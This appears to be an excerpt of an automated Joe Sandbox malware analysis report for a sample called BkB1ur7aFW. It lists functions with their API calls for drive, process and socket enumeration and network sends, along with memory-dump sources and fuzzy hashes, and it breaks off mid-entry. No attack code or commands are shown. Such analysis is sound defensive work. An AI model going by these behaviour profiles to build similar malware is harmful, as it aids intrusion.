                                                              • Opcode Fuzzy Hash: 8135017061805a6dae30ec23685abf5b254015b9ad6b638d5804b07b1a72885f
                                                              • Instruction Fuzzy Hash: AB51E9B29043095FEB126B309C46B7736A8AF5135CF094438EE8D9B253FB75E509C792
                                                              Function 0713030A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 18c98a58706ca5f0ba7eecc6365e38d53a2a450d3bc95bd2f49fae13a4de3880
                                                              • Instruction ID: 056461cd947b15cdee4b90aed0299c7f57ef9763ed30b00be6f9d628cdf9ba8a
                                                              • Opcode Fuzzy Hash: 18c98a58706ca5f0ba7eecc6365e38d53a2a450d3bc95bd2f49fae13a4de3880
                                                              • Instruction Fuzzy Hash: 6031D3FB11C225FE760991A52B586FA6BBED9DB730B32846BF803D1182E3884B490131
                                                              Function 07130321 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: b9b9035b394b49f127e1250bf3cebb0603b2f3b1b256e398e7ef1a42223b5d09
                                                              • Instruction ID: 4cac77028c50dd9b2e4018f5cad10ddf2a53d4d13cc8f61012b02196f7c86839
                                                              • Opcode Fuzzy Hash: b9b9035b394b49f127e1250bf3cebb0603b2f3b1b256e398e7ef1a42223b5d09
                                                              • Instruction Fuzzy Hash: 1C31D6FB15C125FE720991A62B54AFA6BAFD5DF730B32842BF807D6582E3884B494031
                                                              Function 07130342 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: faa64d7e194b8c566353cb2161d0b2919d0d757bfb8ab672a16b9be657885cdd
                                                              • Instruction ID: eac54463559d2ab03c24a7da88cc16117e7fb211ee9aa6e387949c1957babd0c
                                                              • Opcode Fuzzy Hash: faa64d7e194b8c566353cb2161d0b2919d0d757bfb8ab672a16b9be657885cdd
                                                              • Instruction Fuzzy Hash: 5B3129FB11C255BFB20691A52B546FE6BAFD69B730B32846BF843D2182E3944B094032
                                                              Function 0713032A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 144COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: d67cb27e8f66cb3baf71e11856453fed2574be710ee126693b6336cb323a3485
                                                              • Instruction ID: 22aa3c5c59f7680b68fdd62d750e903eb842c1886f070e38f98959ef3537604f
                                                              • Opcode Fuzzy Hash: d67cb27e8f66cb3baf71e11856453fed2574be710ee126693b6336cb323a3485
                                                              • Instruction Fuzzy Hash: 1F31B4FB15C125FE750A95A62B58AFA6BAFD5DB730B328427F803D1582E3894B490131
                                                              Function 0713036F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: dc17703ef8453152620b1b8d74a62287bc2ca97bbf3602a76db5aed656d86935
                                                              • Instruction ID: 8ee467bdc7305fb397c13858fd0925efe5808ddc0fbf171c4e2e35471da9906e
                                                              • Opcode Fuzzy Hash: dc17703ef8453152620b1b8d74a62287bc2ca97bbf3602a76db5aed656d86935
                                                              • Instruction Fuzzy Hash: E521F8FB15C115FE7205D1A52B58AFA7BBED6CB730B32846BF803E2582E3944B094132
                                                              Function 0713038B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: d6c34347125cbd406ed3faae93bab3d458dde102ae562d9ee87fdd0e6b7cf40c
                                                              • Instruction ID: 74954a63e0c12f8411d85d0b6bc5dfcbef3b322e7b39a80f63bf61282f80bd20
                                                              • Opcode Fuzzy Hash: d6c34347125cbd406ed3faae93bab3d458dde102ae562d9ee87fdd0e6b7cf40c
                                                              • Instruction Fuzzy Hash: 4E2107FB11C215FE710591A52B586FE6BBED59F330B32842BF803D6582E3844B094072
                                                              Function 07170333 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703AB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036373690.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID: ZPR
                                                              • API String ID: 2623510744-1010662857
                                                              • Opcode ID: e909b11c46d885e783fe52956deb201e06a91b88cc96aba945852d999f59803b
                                                              • Instruction ID: ca02da74b82672b5f6e45336d54fdd2888c6b46fce37d64be2adef61a4d83f17
                                                              • Opcode Fuzzy Hash: e909b11c46d885e783fe52956deb201e06a91b88cc96aba945852d999f59803b
                                                              • Instruction Fuzzy Hash: 6E21F5EB1AC311BD720A91551F55AF66A7EE6DF3307328436B403C6AC3E3C88A0A9171
                                                              Function 071303EC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,000096CF,-5E0F7D11,-5E0F7D11), ref: 0713050A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 41a519d788f20b798dedb8b219e623ae7a5197bec2655244ffc99368fc7d5d6d
                                                              • Instruction ID: 92df01de699eaebd098676903fc4a7225c8746b5469f806f86bf9711b9396e4b
                                                              • Opcode Fuzzy Hash: 41a519d788f20b798dedb8b219e623ae7a5197bec2655244ffc99368fc7d5d6d
                                                              • Instruction Fuzzy Hash: 7F213BFB11C125FE750691A127586FE2FAFD69B730B32846BF803E6546F3844B094072
                                                              Function 003F78B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID: FD %s:%d sclose(%d)
                                                              • API String ID: 2781271927-3116021458
                                                              • Opcode ID: a5eeea0e9a00efc6f979cf15392249856f234906be44492fcd6ae0abef41039a
                                                              • Instruction ID: df0a0d0ad62bf3f87a5cb04dc8f25dfa9a6562ced6640fa3ef640aad2b388d41
                                                              • Opcode Fuzzy Hash: a5eeea0e9a00efc6f979cf15392249856f234906be44492fcd6ae0abef41039a
                                                              • Instruction Fuzzy Hash: F6D0A733A0A2313B85316A98BC49C6F7BA8DEC6F60B060C58F98077244D2219D0183F3
                                                              Function 004BB060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,004BB29E,?,00000000,?,?), ref: 004BB0BA
                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,004A3C41,00000000), ref: 004BB0C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastconnect
                                                              • String ID:
                                                              • API String ID: 374722065-0
                                                              • Opcode ID: 90ba5852ea03459cdf7e664a0e59c9cf8802479c6c9b38974e35ea5d530a1a75
                                                              • Instruction ID: 77284bc974e0a35b42523cc4aef5dd718beb31e6816e82a6a7c404d00eeb0a1e
                                                              • Opcode Fuzzy Hash: 90ba5852ea03459cdf7e664a0e59c9cf8802479c6c9b38974e35ea5d530a1a75
                                                              • Instruction Fuzzy Hash: ED01D8363042009FCA206A689C84FFBB399FF89364F140B55F978932D1D76AED5087B6
                                                              Function 004A4950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • gethostname.WS2_32(00000000,00000040), ref: 004A4AA5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: gethostname
                                                              • String ID:
                                                              • API String ID: 144339138-0
                                                              • Opcode ID: 3c2dabfd9d5f523806e1461659fe4e1c51d7aea75d89323c9b866d90c63170eb
                                                              • Instruction ID: eccfeed8e70c12296adf55becd942a297a2739fe74a9c35b77ecaefc7fd2ac58
                                                              • Opcode Fuzzy Hash: 3c2dabfd9d5f523806e1461659fe4e1c51d7aea75d89323c9b866d90c63170eb
                                                              • Instruction Fuzzy Hash: FA51D4B06043008BE7309B65DD4972B76D4AFE6319F04093EE98A867D1E7BCF844C71A
                                                              Function 071703D4 Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703AB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036373690.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 0fbca62a12cd1b41af6b93643f1904ce005f2d599e57d82a4a1c50f96e3e223e
                                                              • Instruction ID: 1a65fe93c4d4830529cc6cda74f28a0f2ab1ed003561c8e84894c4183933fdd9
                                                              • Opcode Fuzzy Hash: 0fbca62a12cd1b41af6b93643f1904ce005f2d599e57d82a4a1c50f96e3e223e
                                                              • Instruction Fuzzy Hash: F02106FB2AC311BDB21A95501F16AF65A3EE6DF230B368426B007C65C3F3854A4A80B1
                                                              Function 07170387 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703AB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036373690.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: c74e551a7682fee8a412d34dea39f0302793dcca6fd9d91047548ef6f576c1fd
                                                              • Instruction ID: 5104e73728e520af0b44baff0d460611dce77ba3c29bd146c008f793684defa7
                                                              • Opcode Fuzzy Hash: c74e551a7682fee8a412d34dea39f0302793dcca6fd9d91047548ef6f576c1fd
                                                              • Instruction Fuzzy Hash: 7A11B1FB26C321BD714A95951B1AAFA567EE2DF230B32C436B403D55C3E3C94A4E81B1
                                                              Function 07170399 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703AB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036373690.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 2f15d24bb0366e9db61c8cd8a6c86b895e483abb2650e4968cb4c63a60f4c582
                                                              • Instruction ID: 7c1b9c4d18811ede2e2538c4f85dedf5d20d987f7af330dc2a059e3af2f85fcf
                                                              • Opcode Fuzzy Hash: 2f15d24bb0366e9db61c8cd8a6c86b895e483abb2650e4968cb4c63a60f4c582
                                                              • Instruction Fuzzy Hash: 062135FA26C311BD720A81545F06AB66B7EE6CF2307328425B003C65C2E3C90A0A8171
                                                              Function 0713040A Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 80fd14245dc2e78d5c3edc8c9b87927e9256df39059b876e837f54f369dc025a
                                                              • Instruction ID: d2b3b89bd5fbaf01cbcf4a9ebc8cd4154d662791aaf8367b237a0b5342a82646
                                                              • Opcode Fuzzy Hash: 80fd14245dc2e78d5c3edc8c9b87927e9256df39059b876e837f54f369dc025a
                                                              • Instruction Fuzzy Hash: 3811AFF600C394EFE306A2B41A595F97FBADA5F230F3644AFE846969C3E34447058222
                                                              Function 07130446 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: b95aaafb156f1c07fe9042872c5e41012df5552ba1243fde25aa2f37f925af5b
                                                              • Instruction ID: 289565364f030487e3a2e74458bfb29f9f64b01176a2c3b8250769d02d9e52c8
                                                              • Opcode Fuzzy Hash: b95aaafb156f1c07fe9042872c5e41012df5552ba1243fde25aa2f37f925af5b
                                                              • Instruction Fuzzy Hash: A101F7F645C225FE710962A12B596FA6EFFE65F230B328427F803A5582B38547044062
                                                              Function 071304CD Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,000096CF,-5E0F7D11,-5E0F7D11), ref: 0713050A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 9133053884332a714d22bbc4b20a85bf0bc71aa08d5602ebb086db210eea5d25
                                                              • Instruction ID: f79d68688ae8ffc03f12570025c512b1c282e9cb18ca7587bbfdbced9503c4a3
                                                              • Opcode Fuzzy Hash: 9133053884332a714d22bbc4b20a85bf0bc71aa08d5602ebb086db210eea5d25
                                                              • Instruction Fuzzy Hash: 1F019EF655C622EDA20661E0065E7F63EEB575F531F2308139447A94C2F341C7054091
                                                              Function 07130454 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: d981034a98528a5e3a6fff1a188632738efd3e7396b43375f06ba1911b4673b1
                                                              • Instruction ID: b265ac296214f095aebd2f8dbba576afa4774482c7e0713df5ceae198a70229c
                                                              • Opcode Fuzzy Hash: d981034a98528a5e3a6fff1a188632738efd3e7396b43375f06ba1911b4673b1
                                                              • Instruction Fuzzy Hash: 2F01F9EA158625FE650A62A5175D6F97FAFA66F230B328823F843E6582B34447044162
                                                              Function 07130466 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: e8b9fbdb2aa7198e877aab7ab17fe03c40c76ca1dd246519cf01124c9df3bffe
                                                              • Instruction ID: b38461f3a2bc048da81c884bbde12e5a97fafbc15deb69ba2ca867adbf76b5f1
                                                              • Opcode Fuzzy Hash: e8b9fbdb2aa7198e877aab7ab17fe03c40c76ca1dd246519cf01124c9df3bffe
                                                              • Instruction Fuzzy Hash: 4CF049F6408315EF610AA2B112595B97FEBAB5F330B224867E803F6682E35447008052
                                                              Function 004BAF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 004BAFD0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID:
                                                              • API String ID: 3358416759-0
                                                              • Opcode ID: 0730949898dde383e1335b43e5ec285533dbd09e92aab88a6d110dd90ac5e605
                                                              • Instruction ID: 14c4ddf4a9b20a01932bc62e11864f55677e5a938b32ad771d54fb99c1322434
                                                              • Opcode Fuzzy Hash: 0730949898dde383e1335b43e5ec285533dbd09e92aab88a6d110dd90ac5e605
                                                              • Instruction Fuzzy Hash: C4119670808784D9EB268F18D8027F6B3F4EFD0328F109619E5D942150F7769AD68BD2
                                                              Function 07130492 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,000096CF,-5E0F7D11,-5E0F7D11), ref: 0713050A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 5e255fe195be0a4fb1e0af81b9fca98f1652cc7d3dad1987015372fd3a31f821
                                                              • Instruction ID: e56f9b800eaf6b4f7cc2b248ea85db7580c29af36ed5e3cbc7b21cf74b079559
                                                              • Opcode Fuzzy Hash: 5e255fe195be0a4fb1e0af81b9fca98f1652cc7d3dad1987015372fd3a31f821
                                                              • Instruction Fuzzy Hash: AEF08BF5558532DEA60A623205D93F83AE75B2F130F320037A943D6985D71483444012
                                                              Function 004BA920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • send.WS2_32(?,?,?,00000000,00000000,?), ref: 004BA97F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
